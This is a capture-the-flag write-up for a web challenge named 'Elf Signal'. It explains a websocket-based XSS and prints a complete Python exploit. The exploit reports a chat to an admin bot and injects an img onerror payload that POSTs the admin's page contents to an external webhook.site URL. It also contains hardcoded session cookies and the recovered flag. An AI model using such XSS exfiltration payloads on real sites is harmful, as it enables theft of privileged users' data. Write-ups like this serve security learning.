Challenge
Category: WEB
Before disappearing, our intelligence suggests that the missing elf was using a covert internal application called Elf Signal for communication. We need assistance in investigating the application to uncover the identities involved and the nature of their conversations.
challenge code: elf-signal.zip
Solution
Reconnaissance
This challenge seems to be a XSS challenge. We can inject <img src=x onerror=alert(1)> in a chat and get it to execute. But it is not stored xss, since the vulnerability is only when reciving a message from the websocket connection.
Exploit
When reporting the chat room to the admin they watch the page 5 seconds. We can use this time to send a message to the chat room while the admin is watching, which will get admin to execute our code.
I relized this almost emediatly, but spend way to mutch time trying to open a new Websocket conenction and list the chats with my xss. I managed to do this on myself, but never on the admin… Then I reliced I could get the chat room id from the DOM (document.body.innerHTML), since admin had allready loaded it.
final exploit
import websocket
import json
import requests
import time
import threading
# local
# header = {
# "Cookie": "session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImI2ZDIxMjM1LWM1OWItNGY5Ny1iYTcwLTlmOTRmOTJkODUwMyIsImlhdCI6MTcwMjIxMzQ5OX0.o6X17cbzF3-kVqhtxv3xTZObHy1N0NazqDn7SWomdaw"
# }
# remote
header = {
"Cookie": "session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImIxMGZmZTBhLWRmY2QtNGMwOC1iNzg0LTYyZDY5MmQ3N2U4MiIsImlhdCI6MTcwMjIxNTg5Mn0.r446xCckQibAc07iFSu8sgd6XMhSOHtzBedfdHIzlvg"
}
local = "localhost:1339"
remote = "51.120.248.76:1339"
website = remote
def new_chat(ws):
ws.send(json.dumps({"type":"new"}))
chat_id = json.loads(ws.recv())["chatId"]
return chat_id
def send_message(ws, chat_id, message):
ws.send(json.dumps({"type":"message","chatId":chat_id,"data":message}))
def report_to_admin(chat_id):
print("reporting")
resp = requests.post(f"http://{website}/bot", headers=header, json={"chatId":chat_id})
print(resp.text)
def delayed_send(ws, chat_id, xss_message):
time.sleep(1.5)
send_message(ws, chat_id, xss_message)
print("sent")
xss_message1 = """<img src=x onerror="fetch('https://webhook.site/cae6900b-17e1-4d72-83c1-6c7aea24186e/', { method: 'POST', body: document.body.innerHTML, mode: 'no-cors' });"/>"""
ws = websocket.create_connection(f"ws://{website}", header=header)
chat_id = new_chat(ws)
print(chat_id)
threading.Thread(target=report_to_admin, args=(chat_id,)).start()
threading.Thread(target=delayed_send, args=(ws, chat_id, xss_message1)).start()
This worked and I got that the chat room id was 2e8e8e31a9f7f0768c4e79ea211b8d15
Going to the chat room we find alot of sus messages. It looked like the same message format as the first challenge so I put the massages in there and decoded them. (In henseight after solving the other challenge I reliced that the messages was just python encoded strings)
"Greetings, Sir! I've been devising a plan to sprinkle some enchantment into this holiday season."
'Ah, salutations, little mischief! What manner of festive trickery do you propose?'
"How about a delightful switcheroo? We could sneakily swap out some ornaments on the children's Christmas tree with our own playful creations!"
'Oh, the gleeful havoc that would ensue! Imagine their astonishment finding elf-sized stockings or Grinchy-green baubles in place of their usual adornments! Absolutely devious!'
'Ho ho ho! Their puzzlement turning into holiday delight! But tell me, when do we set our mischievous plan in motion?'
"Next sunday night, beneath the shimmering canopy of stars. It'll be a splendid sight, bringing a touch of magic to their celebrations!"
'A covert escapade, elf?'
'Our little secret, Sir. Let the jingle bells chime in harmony with our laughter!'
"Let's use the code OMEGAPOINT{s1r_gr1nch_w1ll_b3_m4k1ng_4_r3turn_th1s_chr1stm4s} as our signal to commence our antics at that time."
"Ah, the code it is! Join in, ignite new gleeful laughs, everyone! This will be the most joyous prank they've ever encountered!"flag: OMEGAPOINT{s1r_gr1nch_w1ll_b3_m4k1ng_4_r3turn_th1s_chr1stm4s}